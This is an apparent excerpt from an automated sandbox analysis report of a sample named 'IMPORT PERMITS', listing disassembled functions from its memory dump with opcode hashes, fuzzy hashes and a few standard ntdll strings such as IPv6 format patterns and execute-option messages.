                                                                                                                                Function 01422D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 85a521fcff56d28cfd55deedaffbbc0c0ff9742a17226d31fe28c368ec7c41e8
                                                                                                                                • Instruction ID: 4ac6ba9f2ea37fd31df13267f69e373afc8c23867511cec58520bc508213e7e0
                                                                                                                                • Opcode Fuzzy Hash: 85a521fcff56d28cfd55deedaffbbc0c0ff9742a17226d31fe28c368ec7c41e8
                                                                                                                                • Instruction Fuzzy Hash: 0290022120544542D10075585408A06401597E4205F55D112B1068596DC7358952B231
                                                                                                                                Function 01422D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4606da8e407edd9629e84f4c87479812112a3ee3ae9370cb3b4a2d32e7280959
                                                                                                                                • Instruction ID: eef23911ab47611092d7405d2416cd29797417d987704e45f6ae192bdd502639
                                                                                                                                • Opcode Fuzzy Hash: 4606da8e407edd9629e84f4c87479812112a3ee3ae9370cb3b4a2d32e7280959
                                                                                                                                • Instruction Fuzzy Hash: 5490022921340102D1807158540860A401597E5202F95D516B0019559CCA25896A6321
                                                                                                                                Function 01422D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9b01646c5b665e211ad6538158a5c947abd93f621d87ebf3d432f2d4c4014b94
                                                                                                                                • Instruction ID: 57b7152781c643158c65f46c2b5ab1e37b5d4470923a6130e03d42a2b8be198e
                                                                                                                                • Opcode Fuzzy Hash: 9b01646c5b665e211ad6538158a5c947abd93f621d87ebf3d432f2d4c4014b94
                                                                                                                                • Instruction Fuzzy Hash: C590022130140103D140715854186068015E7F5301F55D112F0418555CDA2589576322
                                                                                                                                Function 01422DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b00533a580defcde192c8ecd1631db5cf5aa079b94659423d3d4c5208ec1394b
                                                                                                                                • Instruction ID: a7af27706ca34f0c36aaa6ad9b77bbbb93195716eb37edaf9cae38945cdf3edd
                                                                                                                                • Opcode Fuzzy Hash: b00533a580defcde192c8ecd1631db5cf5aa079b94659423d3d4c5208ec1394b
                                                                                                                                • Instruction Fuzzy Hash: 10900221242442525545B15844045078016A7F4241795C113B1418951CC6369957E721
                                                                                                                                Function 01422DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2144c8a4df175c9004439570d9154c00ff21c57d996926025ffe6d3e1baf146c
                                                                                                                                • Instruction ID: 5754934900cedc0c8d4ffb80dbf2ac2bc831ab2e298b5336171cc2a87e148ee2
                                                                                                                                • Opcode Fuzzy Hash: 2144c8a4df175c9004439570d9154c00ff21c57d996926025ffe6d3e1baf146c
                                                                                                                                • Instruction Fuzzy Hash: 2590023124140502D141715844046064019A7E4241F95C113B0428555EC7658B57BB61
                                                                                                                                Function 01422C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5cb18bfe1aaaf106c8384fae40a5e5c384125e7b47ff5713ba7182355f060885
                                                                                                                                • Instruction ID: 57e4e0cb73980b2a62cda613dddb0950caed1914b0516f126490acaabcc7615d
                                                                                                                                • Opcode Fuzzy Hash: 5cb18bfe1aaaf106c8384fae40a5e5c384125e7b47ff5713ba7182355f060885
                                                                                                                                • Instruction Fuzzy Hash: 9590023120140942D10071584404B46401597F4301F55C117B0128655DC725C9527621
                                                                                                                                Function 01422CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 86d0f8ec776e1780cd3c454a48f5ff6dffc515c132c988e43dc618b1193aeb03
                                                                                                                                • Instruction ID: d8daec56c07fe074780fecd4a22462a6d3c68bff67bb8116bcf993a9a9486220
                                                                                                                                • Opcode Fuzzy Hash: 86d0f8ec776e1780cd3c454a48f5ff6dffc515c132c988e43dc618b1193aeb03
                                                                                                                                • Instruction Fuzzy Hash: C890022160540502D14071585418706402597E4201F55D112B0028555DC7698B5677A1
                                                                                                                                Function 01422CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 277bf209df5b929001af084e4e87e940e3e49364ec2e84031f1a089b6684ad07
                                                                                                                                • Instruction ID: f6b0068d1d21a6257adc93bfdb38f34f392cee78a606adcb7d033b8b9bcc3d6f
                                                                                                                                • Opcode Fuzzy Hash: 277bf209df5b929001af084e4e87e940e3e49364ec2e84031f1a089b6684ad07
                                                                                                                                • Instruction Fuzzy Hash: 2590023120140503D10071585508707401597E4201F55D512B0428559DD76689527221
                                                                                                                                Function 01422CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 32e3652c21a832156df7b506760dd04efa3e082ddd0ea39533ca92537fe86495
                                                                                                                                • Instruction ID: bbc8e781e6cb4b576c3e8d1c3ef081826752c5f73cf8a2c267f23673c6747192
                                                                                                                                • Opcode Fuzzy Hash: 32e3652c21a832156df7b506760dd04efa3e082ddd0ea39533ca92537fe86495
                                                                                                                                • Instruction Fuzzy Hash: 9790023120140502D10075985408646401597F4301F55D112B5028556EC77589927231
                                                                                                                                Function 01422F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 186ea5e07f67ddf3c07037f16f32081d37ab059250abee0c0e528db2209e6de4
                                                                                                                                • Instruction ID: 820b671acecfd011f1c5ac23b3acc377d4c415500511d729e2b9691976424eec
                                                                                                                                • Opcode Fuzzy Hash: 186ea5e07f67ddf3c07037f16f32081d37ab059250abee0c0e528db2209e6de4
                                                                                                                                • Instruction Fuzzy Hash: E190026121140142D10471584404706405597F5201F55C113B2158555CC6398D626225
                                                                                                                                Function 01422F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 515cd9ee8ada5ed775fdc6acb9e8331828354912b3554e4539a5023e95ec3e9e
                                                                                                                                • Instruction ID: f7aba6bd0560446a9f1c66a07b210730e3d614da4ce5c149d701731df7636654
                                                                                                                                • Opcode Fuzzy Hash: 515cd9ee8ada5ed775fdc6acb9e8331828354912b3554e4539a5023e95ec3e9e
                                                                                                                                • Instruction Fuzzy Hash: E890026134140542D10071584414B064015D7F5301F55C116F1068555DC729CD537226
                                                                                                                                Function 01422FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 226f09f5fc327503db36625010d8cf21414250cada93c93aa046d192c7a7a7e9
                                                                                                                                • Instruction ID: c6c2d6975c72699ade5eb485eb3d8598e2ed1ecf2e693bfd48f5235e237dee49
                                                                                                                                • Opcode Fuzzy Hash: 226f09f5fc327503db36625010d8cf21414250cada93c93aa046d192c7a7a7e9
                                                                                                                                • Instruction Fuzzy Hash: 12900221211C0142D20075684C14B07401597E4303F55C216B0158555CCA2589626621
                                                                                                                                Function 01422F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6888c6e66454395aacec729ac6ef879c6c0cd3f2ea9eb97abe9ccb3544afd1ae
                                                                                                                                • Instruction ID: 28a054cdcb48084097455531bcc7b0defdb56be1e7ff7186cf54e0e7b7371423
                                                                                                                                • Opcode Fuzzy Hash: 6888c6e66454395aacec729ac6ef879c6c0cd3f2ea9eb97abe9ccb3544afd1ae
                                                                                                                                • Instruction Fuzzy Hash: 2790023120180502D1007158481470B401597E4302F55C112B1168556DC73589527671
                                                                                                                                Function 01422FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ce0f90b6a0d44d79c21b83fea41bfb88aac4da992c76673197aa0718e918e12e
                                                                                                                                • Instruction ID: 010f7cc22174375095b5a63a8e4468ed744e95c98ab27a1ba9171ec38c91df99
                                                                                                                                • Opcode Fuzzy Hash: ce0f90b6a0d44d79c21b83fea41bfb88aac4da992c76673197aa0718e918e12e
                                                                                                                                • Instruction Fuzzy Hash: 4D90023120180502D10071584808747401597E4302F55C112B5168556EC775C9927631
                                                                                                                                Function 01422FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: beff5565d886e36f48d22d736d623f1d867baca248355a32afc36cce66b8e394
                                                                                                                                • Instruction ID: 6be5f6d47bd6d544238e3f6151a2c1d9f8efe7cb075e9936e449a8d94af1e5d6
                                                                                                                                • Opcode Fuzzy Hash: beff5565d886e36f48d22d736d623f1d867baca248355a32afc36cce66b8e394
                                                                                                                                • Instruction Fuzzy Hash: 7C900221601401424140716888449068015BBF5211755C222B099C551DC66989666765
                                                                                                                                Function 01422E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 73bd64d2473eaa49720f2f1184a7bf4439d0aeff9810945b491164267a77b7c0
                                                                                                                                • Instruction ID: 3ee456e562620cea4b3ec44d65ed705f059f12bdcc5da6a98424762c95a7616b
                                                                                                                                • Opcode Fuzzy Hash: 73bd64d2473eaa49720f2f1184a7bf4439d0aeff9810945b491164267a77b7c0
                                                                                                                                • Instruction Fuzzy Hash: 6090022130140502D102715844146064019D7E5345F95C113F1428556DC7358A53B232
                                                                                                                                Function 01422EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d4d559d7e5ca81d47296f8ea113ebc8c1b5d428e851aa483840964e8ce5e0518
                                                                                                                                • Instruction ID: d10510971852c9e3f1b249b77a6e8535aebcef900deb677c891aa6b0a6141ee1
                                                                                                                                • Opcode Fuzzy Hash: d4d559d7e5ca81d47296f8ea113ebc8c1b5d428e851aa483840964e8ce5e0518
                                                                                                                                • Instruction Fuzzy Hash: BF90026120180503D14075584804607401597E4302F55C112B2068556ECB398D527235
                                                                                                                                Function 01422E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e1534b9766bfabd94be1d283f3e420e6c5aa21386f0c6eb33c2c0e6b80e5f79a
                                                                                                                                • Instruction ID: 5589c26c9f86f35682cd484d774b9917f41f0f339c0b729193588e4b2e1ce48f
                                                                                                                                • Opcode Fuzzy Hash: e1534b9766bfabd94be1d283f3e420e6c5aa21386f0c6eb33c2c0e6b80e5f79a
                                                                                                                                • Instruction Fuzzy Hash: 2490022160140602D10171584404616401A97E4241F95C123B1028556ECB358A93B231
                                                                                                                                Function 01422EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1627a171c7c4793c9d990c5c19e6879771660bf516d9093d6eb0b599bdddb350
                                                                                                                                • Instruction ID: c004b1b69302282d93350b26fdf726ff563353ae97732dba2912cae1bfc272f6
                                                                                                                                • Opcode Fuzzy Hash: 1627a171c7c4793c9d990c5c19e6879771660bf516d9093d6eb0b599bdddb350
                                                                                                                                • Instruction Fuzzy Hash: A590027120140502D14071584404746401597E4301F55C112B5068555EC7698ED67765
                                                                                                                                Function 01423010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b93f297e3e2f50e05a51cb03ccaac2c37ec791f98cd17bae823045b6304c202
                                                                                                                                • Instruction ID: bb4316d7e9bbcc17efa0a3d6f1de1a511839f4d4abe3c0a64946b92c046365f7
                                                                                                                                • Opcode Fuzzy Hash: 0b93f297e3e2f50e05a51cb03ccaac2c37ec791f98cd17bae823045b6304c202
                                                                                                                                • Instruction Fuzzy Hash: FC90022120184542D14072584804B0F811597F5202F95C11AB415A555CCA2589566721
                                                                                                                                Function 01423090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 81088192d17dbd2a28913638a4dc94a4ba718549483ddf317ba38a4a77528030
                                                                                                                                • Instruction ID: c06d983edff15eb4694ff6f5b5e335fd7e00b7e6f7a4af2a4ecee0278edafecc
                                                                                                                                • Opcode Fuzzy Hash: 81088192d17dbd2a28913638a4dc94a4ba718549483ddf317ba38a4a77528030
                                                                                                                                • Instruction Fuzzy Hash: 7890022124140902D140715884147074016D7E4601F55C112B0028555DC7268A6677B1
                                                                                                                                Function 014239B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 461afdbc4b41a01b2b2e5a79729a26c66f3b2e47d232fa8cdd068366ebc4432b
                                                                                                                                • Instruction ID: 70fc9774b09544175c8f2e89473503c7ba5a698138147fd969ba10e457e8ee65
                                                                                                                                • Opcode Fuzzy Hash: 461afdbc4b41a01b2b2e5a79729a26c66f3b2e47d232fa8cdd068366ebc4432b
                                                                                                                                • Instruction Fuzzy Hash: 7190022124545202D150715C44046168015B7F4201F55C122B0818595DC66589567321
                                                                                                                                Function 01423D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
                                                                                                                                • Instruction ID: b7d177fb80ad9f0cce620e4d2c7afdf9b4ed8dafc4caa90f0296daa2b775bec0
                                                                                                                                • Opcode Fuzzy Hash: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
                                                                                                                                • Instruction Fuzzy Hash: 4E90023520140502D51071585804646405697E4301F55D512B0428559DC76489A2B221
                                                                                                                                Function 01423D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
                                                                                                                                • Instruction ID: 8151441d0d5afaad8e7c87d694ca9d6167130c5449e87cf0441e26282bb81bb7
                                                                                                                                • Opcode Fuzzy Hash: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
                                                                                                                                • Instruction Fuzzy Hash: 0990023120240242954072585804A4E811597F5302B95D516B0019555CCA2489626321
                                                                                                                                Function 01422C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                • Instruction ID: 979be13648effb931f065e19da141a5d03dbee761b8e7a568487bec3bf28b0a2
                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                Function 01422890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: bfe7ed5e5f83dd8b8794a0a99e09f89fafac69ea686b069dc8ba205f7e7047a7
                                                                                                                                • Instruction ID: 41d0ff9fe66695e44b2edc8830113776610df93d09c97837273899713b579d37
                                                                                                                                • Opcode Fuzzy Hash: bfe7ed5e5f83dd8b8794a0a99e09f89fafac69ea686b069dc8ba205f7e7047a7
                                                                                                                                • Instruction Fuzzy Hash: 2951E7B2B001266FCB21DB9D8880D7FFBB8BB49244794822BF555D7752D3B4DE408BA0
                                                                                                                                Function 01492410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: a9f1509a1c7f2991646875c40ca5e1bc0575344ded0a5853ad5c8cbdbe0371ab
                                                                                                                                • Instruction ID: ceeb45a59c8f00879b502ef51e8b4954bfd7c850f1537c6d03124f27757cb24b
                                                                                                                                • Opcode Fuzzy Hash: a9f1509a1c7f2991646875c40ca5e1bc0575344ded0a5853ad5c8cbdbe0371ab
                                                                                                                                • Instruction Fuzzy Hash: 8851E4B5A00645BFCF20DE9DC990D7FBFB8AB48204B04846FE596D7792E6B4DA008760
                                                                                                                                Function 01417630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014546FC
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01454742
                                                                                                                                • Execute=1, xrefs: 01454713
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01454787
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01454655
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01454725
                                                                                                                                • ExecuteOptions, xrefs: 014546A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: 0f8733e55a61858505011a77170340b99865de0471c335688fc05fcb437a98f8
